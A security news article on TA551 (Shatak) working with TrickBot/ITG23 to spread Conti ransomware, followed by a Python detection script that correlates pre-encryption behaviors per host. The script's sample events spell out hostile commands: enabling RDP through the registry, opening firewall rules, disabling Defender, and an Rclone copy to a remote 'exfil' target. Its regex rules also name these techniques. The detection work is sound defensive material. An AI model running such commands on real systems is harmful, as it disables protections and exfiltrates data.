Shatak (TA551), a threat actor, recently teamed up with the ITG23 gang (also known as Wizard Spider and TrickBot) to distribute Conti ransomware to targeted computers.
The Shatak organization collaborates with other malware creators to build phishing campaigns that download malware and infect victims.
Researchers from IBM X-Force revealed that Shatak and TrickBot started collaborating in July 2021, with good success, as the campaigns have persisted to this day.
Cybereason’s new technical investigation delves deeper into how the two separate hackers collaborated to launch ransomware operations.
A typical infection chain begins with Shatak sending a phishing email with a password-protected zip containing a malicious document.
Shatak frequently leverages reply-chain emails taken from prior victims and adds password-protected archive files, according to an IBM X-Force investigation from October.
These files contain scripts that use base64-encoded code to download and install the BazarBackdoor or TrickBot malware from a remote site.
Most of the current campaign’s distribution sites are in European countries, including Germany, Slovakia, and the Netherlands.
ITG23 takes control of the compromised machine once TrickBot and/or BazarBackdoor is deployed, by dropping a Cobalt Strike beacon and registering it as a scheduled task for persistence.
The Conti actors then use the dropped BazarBackdoor for network reconnaissance, identifying users, domain administrators, shared machines, and shared resources.
Then they steal user credentials, password hashes, and Active Directory information and use everything they can to expand laterally via the network.
Fiddling with registry entries that permit RDP access and altering Windows Firewall rules with the ‘netsh’ tool are two examples of this behavior.
Windows Defender’s real-time monitoring is also disabled to prevent alerts or interventions during the encryption process.
For data exfiltration, the last step before encryption, Conti uses the ‘Rclone’ program to transfer everything to a remote endpoint under their control.
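The configuration changes described above (RDP enabled through the registry, firewall rules altered with netsh, Defender real-time monitoring switched off, a scheduled task for the beacon, and Rclone transfers) all leave process-creation telemetry that a defender can match on. The following is an added detection example written for this article; it is not code from the Cybereason or IBM X-Force reports. The sample events are constructed, and the specific command patterns it looks for (the `fDenyTSConnections` registry value, `Set-MpPreference -DisableRealtimeMonitoring`, `netsh advfirewall`, `schtasks /create`, `rclone copy`) are assumptions about how these behaviors typically appear in logs, not details taken from the article.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed process-creation events in a Sysmon Event ID 1-like shape.
# These are sample records written for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\netsh.exe",
     "cmdline": 'netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=TCP localport=3389'},
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -nop -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": 'schtasks /create /tn "Updater" /tr "C:\\Users\\Public\\update.exe" /sc minute /mo 5'},
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Users\\Public\\rclone.exe",
     "cmdline": "rclone.exe copy C:\\Shares\\Finance remote:exfil --transfers 8"},
    # Benign activity on another host, included so the rules have something to ignore.
    {"host": "WS02", "user": "CORP\\svc_backup", "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\svc_backup\\notes.txt"},
]

# Assumed command-line patterns for each behavior named in the article.
# The registry value and cmdlet names are the usual mechanisms, chosen here as assumptions.
RULES = {
    "firewall_rule_change": re.compile(r"netsh\s+(advfirewall|firewall)\b.*\b(add|set)\b", re.I),
    "rdp_enabled_via_registry": re.compile(r"fDenyTSConnections.*/d\s+0\b", re.I),
    "defender_realtime_disabled": re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true", re.I),
    "scheduled_task_from_user_writable_path": re.compile(r"schtasks\b.*/create\b.*\\(Users|ProgramData|Temp)\\", re.I),
    "rclone_transfer": re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I),
}


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    rule: str
    cmdline: str


def detect(events):
    """Run every rule over every event's command line and return the matches."""
    findings = []
    for ev in events:
        cmd = ev.get("cmdline", "")
        for name, pattern in RULES.items():
            if pattern.search(cmd):
                findings.append(Finding(ev["host"], ev["user"], name, cmd))
    return findings


def hosts_with_staging_pattern(findings, threshold=3):
    """Hosts on which several distinct pre-encryption behaviors were seen.

    A single hit (for example one firewall rule) is routine admin noise; the article's
    point is that these changes cluster on the same machine shortly before encryption,
    so correlating distinct rule hits per host is what makes the alert worth paging on.
    """
    per_host = defaultdict(set)
    for f in findings:
        per_host[f.host].add(f.rule)
    return sorted(h for h, rules in per_host.items() if len(rules) >= threshold)


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for h in hits:
        print(f"{h.host} {h.user} {h.rule}: {h.cmdline}")
    print("hosts showing a pre-encryption staging pattern:", hosts_with_staging_pattern(hits))
```

In production the events would come from Sysmon or Windows Security 4688 logs with command-line auditing enabled; the correlation threshold is deliberately per-host rather than per-user, since the article describes these steps being taken after credentials have already been stolen and reused.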
Threat actors use ransomware to encrypt devices after extracting all critical data from the network.
Employee training on the dangers of phishing emails is the strongest defense against these sorts of cyberattacks.
Aside from that, administrators should impose multi-factor authentication on users, terminate unneeded RDP services, and check the appropriate event logs for unexpected configuration changes regularly.
Finally, a crucial safety step is periodically storing vital data to a secure remote place and then putting those backups offline so threat actors can’t target them.